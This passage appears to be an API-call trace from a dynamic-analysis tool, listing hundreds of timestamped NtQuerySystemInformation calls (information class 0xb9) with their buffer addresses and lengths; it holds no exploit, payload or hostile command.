(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x28, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0272.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0272.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) 